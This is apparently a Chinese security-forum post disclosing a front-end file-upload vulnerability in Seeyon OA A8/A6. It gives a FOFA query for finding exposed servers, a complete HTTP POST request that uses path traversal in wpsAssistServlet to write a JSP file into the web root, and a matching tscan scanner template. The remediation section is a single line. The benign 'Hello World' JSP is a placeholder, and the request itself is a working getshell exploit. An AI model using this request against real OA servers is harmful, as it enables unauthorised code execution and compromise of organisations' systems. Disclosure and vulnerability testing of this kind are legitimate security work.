一、漏洞详情
2022年护网期间公开漏洞显示致远OA前台存在文件上传漏洞可getshell
二、漏洞影响范围
漏洞影响的产品版本包括:致远A8、A6
三、漏洞复现
使用 fofa搜索
app=”致远A8”
漏洞链接:
http://x.x.x.x:82/seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1
poc:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1 HTTP/1.1
Host: x.x.x.x:8099
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
Gecko/20100101 Firefox/98.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,im
age/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enþUS;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
Connection: close
Cookie: JSESSIONID=C77EC989100FFE68041E88B49E6B38FF
Upgrade-Insecure-Requests: 1
Content-Length: 271
-----------------------------120466775124259350661042728135
Content-Disposition: form-data; name="upload"; filename="2.txt"
Content-Type: application/octet-stream
<%
out.println("Hello Wor111ld!");
%>
-----------------------------120466775124259350661042728135--burp:
成功上传:
tscan poc
params: []
name: "致远OAwpsAssistServlet前台文件上传"
set: {}
rules:
- method: POST
path: /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1
headers:
Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
body: |2-
-----------------------------120466775124259350661042728135
Content-Disposition: form-data; name="upload"; filename="2.txt"
Content-Type: application/octet-stream
<%
out.println("Hello Wor111ld!");
%>
-----------------------------120466775124259350661042728135--
search: ""
followredirects: false
expression: response.status==200
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
四、漏洞处置建议
尽快升级到最新版本。
请登录后查看回复内容